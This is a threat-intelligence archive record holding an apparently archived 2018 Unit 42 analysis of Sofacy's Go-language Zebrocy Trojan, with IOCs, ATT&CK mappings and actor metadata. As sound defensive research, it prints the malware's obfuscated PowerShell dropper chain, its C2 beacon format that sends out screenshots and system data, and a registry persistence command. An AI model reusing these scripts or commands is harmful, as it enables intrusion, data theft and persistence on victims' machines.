{
	"id": "8a39c871-efc6-47b4-bda5-b2482784ba1c",
	"created_at": "2026-04-06T00:11:12.392742Z",
	"updated_at": "2026-04-10T03:37:50.064545Z",
	"deleted_at": null,
	"sha1_hash": "4000a7a47121d5fc7680e18c6f076739c80b8233",
	"title": "Sofacy Creates New ‘Go’ Variant of Zebrocy Tool",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 271379,
	"plain_text": "Sofacy Creates New ‘Go’ Variant of Zebrocy Tool\r\nBy Robert Falcone\r\nPublished: 2018-12-18 · Archived: 2026-04-05 12:51:54 UTC\r\nThe Sofacy threat group continues to carry out attacks using their Zebrocy tool. We first wrote about the Zebrocy tool in a\r\nblog that discussed Sofacy’s parallel attack campaigns during the first quarter of 2018, and more recently during Sofacy\r\nattacks in late October and early November. The developers of Zebrocy have once again created a new version the Trojan\r\nusing a different programming language, specifically the Go language. The use of a different programming language to\r\ncreate a functionally similar Trojan is not new to this group, as past Zebrocy variants have been developed in AutoIt, Delphi,\r\nVB.NET, C# and Visual C++. While we cannot be certain the impetus for this, we believe the threat group uses multiple\r\nlanguages to create their Trojans to make them differ structurally and visually to make detection more difficult.\r\nWe have seen two separate attacks deliver the Go variant of Zebrocy. The first attack occurred on October 11 and relied on a\r\nspear-phishing email with an LNK shortcut attachment. The LNK shortcut is meant to run a series of PowerShell scripts to\r\nextract a payload from the shortcut to install and execute; however, the PowerShell scripts were coded incorrectly and could\r\nnot install or run the payload as delivered. Therefore, the first observed attack mentioned in this blog could not be\r\nsuccessful, but the tactics, techniques and indicators are worth discussing for situational awareness. More recently, we have\r\nseen Sofacy delivering the Go variant of Zebrocy using a document related to the Dear Joohn attack campaign that occurred\r\nin mid-October through mid-November.\r\nThe First Attack\r\nThe attack occurred on October 11, 2018 and involved a spear-phishing email (T1193) discussing the effects of US sanctions\r\non the Russian economy. The “From” address and the signature included the name of an individual at the targeted\r\norganization. The “To” field in the delivery email was blank, which makes us believe that the targeted individuals were\r\nincluded in the “Bcc” field of this email. Figure 1 shows the delivery email used in this attack.\r\nFigure 1 Delivery email used in Go Zebrocy attack\r\nThe Payload\r\nThe delivery document Противодействие Думы Санкциям США.doc\r\n(SHA256:d77eb89501b0a60322bc69692007b9b7f1b5a85541a2aaf21caf7baf0fe0049e) attempts to masquerade as a Word\r\ndocument, however, the file is a shortcut LNK. When opened (T1204), the LNK file attempts to run the following command\r\nline in a visible command prompt (T1059):\r\npowershell.exe -nop -w 1 $i853=\r\n[TeXt.EnCoDING]::utF8.geTStrInG([conVErT]::frOmbaSE64stRing('JHAxLCRwMj0zNjU5LDY5MjQ3NjQ7JHBhdGhUb0xOSz0nQzUgcmVnaW\r\n$i853;\r\nThe shortcut uses PowerShell (T1086) to base64 decode (T1140) a second PowerShell script and executes it. The second\r\nPowerShell script decodes to the following:\r\n$p1,$p2=3659,6924764;$pathToLNK='C5 regional conference and training workshop on community\r\npolicing(1).docx.lnk';if(-nOT(TeSt-pAtH $pathToLNK)){$DirD=GeT-CHILdITEM -pAth $env:temp -fiLTer\r\nhttps://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/\r\nPage 1 of 7\n\n$pathToLNK -rEcUrSE;[iO.diRectoRY]::sETCUrrentDIrEctoRY($DirD.dIreCTORYNAMe);}$FileStreama=nEw-objECT io.fILeSTreAm $pathToLNK,'OpeN','ReAd','reaDwRITE';$ArrayMas=NEw-objecT byTE[]\r\n($p2);$FileStreama.SEeK($p1,[io.SeEKoRiGin]::BEGin);$FileStreama.rEAD($ArrayMas,0,$p2);$ArrayMas=\r\n[ConverT]::FrOmbasE64CHarArRAy($ArrayMas,0,$ArrayMas.LeNGTh);$duacajuA=\r\n[texT.EnCOdInG]::Unicode.gETstRIng($ArrayMas);ieX $duacajuA;\r\nThe PowerShell script above attempts to extract another PowerShell script directly from the LNK shortcut file, which it\r\nwould then execute. For unknown reasons, the actor that created this LNK shortcut included the incorrect filename for the\r\nLNK file, specifically C5 regional conference and training workshop on community policing(1).docx.lnk instead of the\r\ndelivery document Противодействие Думы Санкциям США.doc.  The LNK shortcut filename does not match the\r\nfilename delivered in the email, so this attack would never be successful as the PowerShell script above would be unable to\r\nobtain the payload to install on the system. The C5 regional conference and training workshop on community\r\npolicing(1).docx.lnk filename included in this LNK file may be an artifact from a previous attack using the same delivery\r\nLNK and payload.\r\nHad the attackers included the correct filename to the LNK delivery in the script above, it would have located the\r\nPowerShell script in the LNK file by using a hardcoded offset of \"3659\", which it would have used to seek 3659 bytes into\r\nthe LNK file. The script would then read a hardcoded number of bytes, specifically 6,924,764 bytes from this offset and\r\nexecutes it. The resulting PowerShell script obtained from within the LNK file has the following contents, of which we have\r\ntrimmed some of the encoded data and replaced it with \"[..snip..]\" for brevity:\r\n$6vlJwyyB = @('C5 regional conference and training workshop on community policing(1).exe','C5 regional\r\nconference and training workshop on community policing(1).docx');$TcCd3Fej = \"C5 regional conference and\r\ntraining workshop on community policing(1).exe\";$Aq3NkyDG =\r\n@(\"TVqQAAMA[..snip..]\",\"UEsDBBQABgAIAA[..snip..]\");$ggdDQhlx = \"C5 regional conference and training\r\nworkshop on community policing(1).docx\";FOR($I=0;$I -lt $6vLjwYYb.LengTH;$i++){[BYtE[]]$YGktk0Nk =\r\n[cOnveRt]::frOmBaSE64StriNg($aq3nkYDg[$I]);\r\n[syStEm.IO.fILE]::WrItEaLlbYtES($EnV:pUbLIc+\"\\\"+$6VLJwYYB[$I],$YGktK0nk);}$qsVmUm76 =\r\n$Env:public+\"\\\"+$tCcd3Fej;$GGdDQhLxPatH = $env:publIC+\"\\\"+$gGddQHLX;staRT-pROCess -wINDowstylE\r\nHIDdeN -FIlepAth $qsVMuM76;StART-ProceSs -FilepaTh $GgDdQHlxpATH;\r\nThis final PowerShell script is responsible for decoding an executable and Word document that it will write to the system in\r\nthe %PUBLIC% folder with names C5 regional conference and training workshop on community policing(1).exe and C5\r\nregional conference and training workshop on community policing(1).docx, respectively. The decoded content written to the\r\nWord document contains the decoy content seen in Figure 2\r\n(SHA256:b6b2f6aae80cba3fa142bd216decc1f6db024a5ab46d9c21cf6e4c1ab0bbe58b), which in this specific case is an\r\nagenda for a conference that occurred between June 18 and 20, 2018 in Dushanbe, Tajikistan sponsored by Saferworld and\r\nthe United States Institute of Peace.\r\nFigure 2 Decoy document opened during installation of Go Zebrocy\r\nThe decoded executable is the payload (SHA256:\r\nfcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e) whose developer wrote in the Go Language,\r\nwhich appears to be a variant of the Zebrocy Trojan that we have previously analyzed. The use of another language to\r\ndevelop a similar Trojan in functionality to Zebrocy is fitting for this threat group, as we have previously seen this group\r\ncreate variants of Zebrocy in AutoIt, Delphi and C++. The similarities between this payload and previous Zebrocy variants\r\ninclude general high-level capabilities as well as some more specific overlaps. Like other Zebrocy samples, this Zebrocy\r\nhttps://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/\r\nPage 2 of 7\n\nvariant written in Go does initial collection on the compromised system (T1119), exfiltrates this information to the C2 server\r\nand attempts to download, install and execute a payload from the C2. The Go variant also has some more specific overlaps\r\nin its functionality, including:\r\nThe use of ASCII hexadecimal obfuscation of strings\r\nThe use of the volume serial number without a hyphen obtained from the VOL command\r\nThe use of the output from \"systeminfo\" and \"tasklist\" in the outbound C2 beacon\r\nThe use of the string \"PrgStart\" within the C2 beacon\r\nThe most important overlap between the Go variant of Zebrocy and other variants is a shared C2 URL, specifically\r\nhxxp://89.37.226[.]148/technet-support/library/online-service-description.php?id_name= that was also used by Zebrocy\r\nsamples de31a8a9110b32a82843e9216a3378cc1c5ea972a6bb2261ec111efb82f31e71 and\r\ndaf990f0b6564c3ac87fa87e325e6ffc907ed43ae65a3f088a42b5b120612593, which were both written in Delphi.\r\nThe Go variant of Zebrocy attempts to evade automated analysis by checking the executable filename of its process for the\r\n“)” character. If the filename does not contain a “)” character, the Trojan immediately exits without executing its functional\r\ncode. The Trojan looks for this character specifically, because it expects to run as a file named C5 regional conference and\r\ntraining workshop on community policing(1).exe.\r\nThis Zebrocy variant uses HTTP POST requests to interact with its C2 server (T1071), which contains system specific\r\ninformation in the POST data section. The system specific information includes\r\nRunning processes via “tasklist” command (T1057).\r\nSystem information via the ”systeminfo” command (T1082).\r\nLocal disk information (T1120) via WMI by running the command “wmic logicaldisk get\r\ncaption,description,drivetype,providername,size” (T1047).\r\nA screenshot of the desktop (T1113) that the GoZebrocy tool takes using an open source Go library.\r\nThe C2 communications between the Trojan and its C2 has the following structure:\r\nPOST /technet-support/library/online-service-description.php?id_name=[serial number from VOL command with hyphen\r\nremoved] HTTP/1.1\r\nHost: 89.37.226[.]148\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 570690\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\nattach=PrgStart%3A[path to running Trojan]%0D%0A%5B[current time]%5D%0D%0A%0D%0A[results from wmic\r\nlogicaldisk get caption,description,drivetype,providername,size]%0D%0D%0A%0D%0D%0A%0D%0A%0D%0A[results\r\nsysteminfo command]%0D%0A%0D%0A%0D%0A[results tasklist command]%0D%0A\u0026support=[screenshot of system\r\nrepresented as ascii hexadecimal bytes]\r\nThe C2 server will respond to this HTTP POST request with ascii hexadecimal bytes that the payload will decode and save\r\nto the following file (T1105):\r\n%APPDATA%\\Identities\\{83AF1378-986F-1673-091A-02681FA62C3B}\\w32srv.exe\r\nThe payload will then execute this newly created file using the Golang \"os/exec\" module, specifically using the \"Command\"\r\nand \"Run\" functions in the \"os/exec\" module to run the following command line:\r\ncmd /C %APPDATA%\\Identities\\{83AF1378-986F-1673-091A-02681FA62C3B}\\w32srv.exe\r\nDear Joohn Related Delivery\r\nThe second attack we observed delivering the Zebrocy variant written in the Go language is related to the Dear Joohn\r\nattacks that we have previously published. While the Dear Joohn campaign occurred in mid-October to mid-November\r\n2018, the delivery document (SHA256: 346e5dc097b8653842b5b4acfad21e223b7fca976fb82b8c10d9fa4f3747dfa0) that\r\nultimately installed the Go Zebrocy sample was created on December 3, 2018. This delivery document had an author name\r\nof Joohn, which is how we clustered the Dear Joohn delivery documents for that campaign.\r\nLike the Dear Joohn attacks, the delivery document downloads a remote template (SHA256:\r\n07646dc0a8c8946bb78be9b96147d4327705c1a3c3bd3fbcedab32c43d914305) via HTTP (T1071) that has an author and last\r\nsaved by xxx. Upon opening the delivery document, the lure image seen in Figure 3 attempts to trick the recipient into\r\nenabling content (T1204) to run the macro within the downloaded remote template.\r\nhttps://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/\r\nPage 3 of 7\n\nFigure 3 Lure image attempting to trick user into clicking the Enabling Content button\nThe delivery document is configured to obtain a remote template from hxxps://bit[.]ly/2G8QrgL (T1102), as seen in the\nfollowing from the document’s word/_rels/settings.xml.rels file:\n?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e\nThe hxxps://bit[.]ly/2G8QrgL shortened link redirects to the remote template hosted at a URL of\nhxxp://89.37.226[.]123/Templates/NormalOld.dotm. Previous Dear Joohn delivery documents did not use a shortened link\nto obtain its remote template, which suggests a shift in techniques used in this campaign. Fortunately for us, the shortened\nlink provides some statistics on how many visitors accessed the link and their country of origin. When accessed on\nDecember 5, 2018, Figure 4 shows the statistics for the shortened link, showing the link was created on December 3, 2018 at\n12:56 PM, which was visited 75 times from mostly from Turkey.\nFigure 4 Statistics on visitors to the shortened link used to point to remote template (Accessed December 5, 2018)\nThe remote template downloaded via this shortened link contains a macro similar to other Dear Joohn samples. The macro\ndiffers as it extracts a ZIP from the remote template file (SHA256:\nc817aab6e8dcaeaeae817a85ba209c0ca690be58b91e6cff0e3f0660336f9506) and saves it to a file named driver_pack.zip.\nThe archive contains an executable named driver_pack.exe (SHA256:\nb48b3d46ebfa6af8a25c007f77e6ed3c32fe4c6478311b8b0c7d6f4f8c82de76), which is a WinRAR SFX executable archive\nthat contains another executable named comsvc.exe. The WinRAR SFX archive extracts the comsvc.exe payload using the\nfollowing SFX script:\nPath=%APPDATA%\\AppHistory\nSetup=comsvc.exe\nSilent=1\nOverwrite=2\nThe comsvc.exe executable (SHA256: 93680d34d798a22c618c96dec724517829ec3aad71215213a2dcb1eb190ff9fa) is a\nUPX packed variant of the Go Zebrocy malware (SHA256:\nhttps://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/\nPage 4 of 7\n\n15a866c3c18046022a810aa97eaf2e20f942b8293b9cb6b4d5fb7746242c25b7), which is a downloader responsible for\r\nobtaining and executing secondary payloads from a C2 server.\r\nLike other Zebrocy variants, this Go Zebrocy malware checks the path of the running process to make sure it contains\r\ncomsvc, as it would if executed by the delivery document that would eventually save the payload to comsvc.exe. If the Go\r\nZebrocy sample was not run as comsvc.exe, it will send an HTTP POST request to google[.]com unlike other Zebrocy\r\nvariants that will just exit, which we believe this is an attempt to further evade heuristic detection. Figure 5 shows the HTTP\r\nrequest sent to google[.]com.\r\nFigure 5 HTTP POST to google.com in the event Go Zebrocy executes with incorrect filename\r\nThe data sent in the HTTP POST request in Figure 5 decodes to \u003c#0\u003e0\u003c##0\u003e\u003c#1\u003e1\u003c##1\u003e\u003c#2\u003e1\u003c##2\u003e, which does not\r\nnecessarily have any purpose other than filling the same HTTP POST data delimiters that Go Zebrocy will use when\r\ncommunicating with the C2. In the event that the sample was run as comsvc.exe, the Trojan will reach out to the following\r\nURL to communicate with its C2 server:\r\nhxxp://89.37.226[.]123/advance/portable_version/service.php\r\nThe Go Zebrocy tool will get the volume serial number, take a screenshot of the system (T1113) and gather system specific\r\ninformation using a legitimate library called psutil that is available on Github. The Trojan will call the Host Info function\r\nfrom the psutil library that will effectively gather platform information (operating system, version etc.), the time the system\r\nwas booted, the system uptime, the system’s GUID, and process IDs for running processes (T1057). The Zebrocy variant\r\nwill send an HTTP POST request (T1071) to the above URL with post data structured as follows:\r\nproject=%3C%230%3E4D291F48%3C%23%230%3E%3C%231%3E[serial number of storage\r\nvolume]%3C%23%230%3E%3C%231%3E[gathered system information]%3C%23%231%3E%3C%232%3E[screenshot in\r\nJPEG format]%3C%23%232%3E\r\nThe hexadecimal characters in the HTTP POST data are used as delimiters, which represent the following:\r\n\u003c#0\u003e[serial number of storage volume]\u003c##0\u003e\u003c#1\u003e[gathered system information]\u003c##1\u003e\u003c#2\u003e[screenshot in JPEG format]\r\n\u003c##2\u003e\r\nThe C2 will respond to the above request with a hexadecimal encoded payload that the Trojan will save to the system and\r\nexecute. The Trojan writes the secondary payload to the following file:\r\n%LOCALAPPDATA%\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\wcncsvc.exe\r\nBefore executing the dropped file, the Trojan will create an auto run registry key (T1060) to have the secondary payload run\r\neach time the user logs in using the following command line (T1059):\r\nreg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Media Center Extender Service\r\nDuring our analysis, the secondary payload downloaded from the C2 is another Trojan written in Go language (SHA256:\r\n50d610226aa646dd643fab350b48219626918305aaa86f9dbd356c78a19204cc), which the actors packed with UPX\r\n(SHA256: ee9218a451c455fbca45460c0a27e1881833bd2a05325ed60f30bd4d14bb2fdc) (T1045). This secondary payload is\r\nanother downloader that uses HTTPS instead of HTTP for its C2 communications. This secondary payload communicates\r\nwith the following URL as its C2:\r\nhxxps://190.97.167[.]186/pkg/image/do.php\r\nThe HTTP POST request sent via HTTPS will look as follows, specifically including the first four bytes of the volume serial\r\nnumber and the first four characters of the hostname within the post data in a field labeled \"l\" as seen in Figure 6.\r\nhttps://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/\r\nPage 5 of 7\n\nFigure 6 HTTP beacon sent by the secondary payload within its HTTPS C2 channel\r\nConclusion\r\nThe Sofacy group continues to use variants of the Zebrocy payload in its attack campaigns. Developers of Zebrocy continue\r\nto create new variants of the Trojan using different coding languages, which in this particular case used the Go language.\r\nThe adversaries made some drastic errors to the delivery LNK shortcut, which made this attack seemingly ineffective.\r\nRegardless of the attack’s effectiveness, the techniques and indicators we observed still provide analytical points for\r\ncorrelation and should be included in an organizations security defenses as the group may use the payload and infrastructure\r\nin future attacks. It is also apparent that the Sofacy group will use these new variants of Zebrocy across multiple different\r\ncampaigns, as the Go variant of Zebrocy was delivered via the LNK shortcut and a Dear Joohn delivery document.\r\nPalo Alto customers can protect themselves against this threat by:\r\nUsing a file blocking profile on our next-gen firewall to block LNK shortcuts sent via email. Please reference the\r\nfollowing knowledge base article for more information on how to configure this capability:\r\nhttps://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClT8CAK\r\nThreat Prevention customers are protected by the Gen Command And Control Traffic\r\nAutoFocus customers can track this Zebrocy variant via the Zebrocy\r\nIndicators of Compromise\r\nZebrocy Go variant\r\nfcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e\r\n93680d34d798a22c618c96dec724517829ec3aad71215213a2dcb1eb190ff9fa\r\nZebrocy Go C2\r\nhxxp://89.37.226[.]148/technet-support/library/online-service-description.php\r\n89.37.226[.]148\r\nhxxp://89.37.226[.]123/advance/portable_version/service.php\r\n89.37.226[.]123\r\nRelated Zebrocy Samples\r\nde31a8a9110b32a82843e9216a3378cc1c5ea972a6bb2261ec111efb82f31e71\r\ndaf990f0b6564c3ac87fa87e325e6ffc907ed43ae65a3f088a42b5b120612593\r\n308b41db9e3b332bb5b3e5ec633907761eac5082029b8b32e6b063b8c76b7365\r\nf93b89a707c647ba492efe4515bb69a627ce14f35926ee4147e13d2e030ab55b\r\n1ff4e56419ad1814726ca143fc256cca4c8588605536c48dd79cfed12cb0763a\r\nDear Joohn Related Hashes\r\n346e5dc097b8653842b5b4acfad21e223b7fca976fb82b8c10d9fa4f3747dfa0 - Delivery Document\r\n07646dc0a8c8946bb78be9b96147d4327705c1a3c3bd3fbcedab32c43d914305 - Remote Template\r\nc817aab6e8dcaeaeae817a85ba209c0ca690be58b91e6cff0e3f0660336f9506 - ZIP in Remote Template\r\nb48b3d46ebfa6af8a25c007f77e6ed3c32fe4c6478311b8b0c7d6f4f8c82de76 - WinRAR SFX in ZIP\r\n93680d34d798a22c618c96dec724517829ec3aad71215213a2dcb1eb190ff9fa - Go Zebrocy sample\r\n50d610226aa646dd643fab350b48219626918305aaa86f9dbd356c78a19204cc - Secondary payload\r\nDear Joohn Related URLs\r\nhxxps://bit[.]ly/2G8QrgL - Remote Template Shortened Link\r\nhxxp://89.37.226[.]123/Templates/NormalOld.dotm - Remote Template URL\r\nhxxp://89.37.226[.]123/advance/portable_version/service.php - Go Zebrocy HTTP C2\r\nhxxps://190.97.167[.]186/pkg/image/do.php - Secondary payload HTTPS C2\r\nSecondary Payload Hash\r\nhttps://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/\r\nPage 6 of 7\n\n50d610226aa646dd643fab350b48219626918305aaa86f9dbd356c78a19204cc\r\nSecondary Payload C2\r\nhxxps://190.97.167[.]186/pkg/image/do.php\r\n190.97.167[.]186\r\nATT\u0026CK Techniques Observed\r\nID Technique\r\nT1193 Spearphishing Attachment\r\nT1059 Command-Line Interface\r\nT1086 PowerShell\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1119 Automated Collection\r\nT1071 Standard Application Layer Protocol\r\nT1057 Process Discovery\r\nT1082 System Information Discovery\r\nT1120 Peripheral Device Discovery\r\nT1047 Windows Management Instrumentation\r\nT1113 Screen Capture\r\nT1105 Remote File Copy\r\nT1102 Web Service\r\nT1204 User Execution\r\nT1060 Registry Run Keys / Startup Folder\r\nT1045 Software Packing\r\nSource: https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/\r\nhttps://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/"
	],
	"report_names": [
		"sofacy-creates-new-go-variant-of-zebrocy-tool"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434272,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4000a7a47121d5fc7680e18c6f076739c80b8233.pdf",
		"text": "https://archive.orkl.eu/4000a7a47121d5fc7680e18c6f076739c80b8233.txt",
		"img": "https://archive.orkl.eu/4000a7a47121d5fc7680e18c6f076739c80b8233.jpg"
	}
}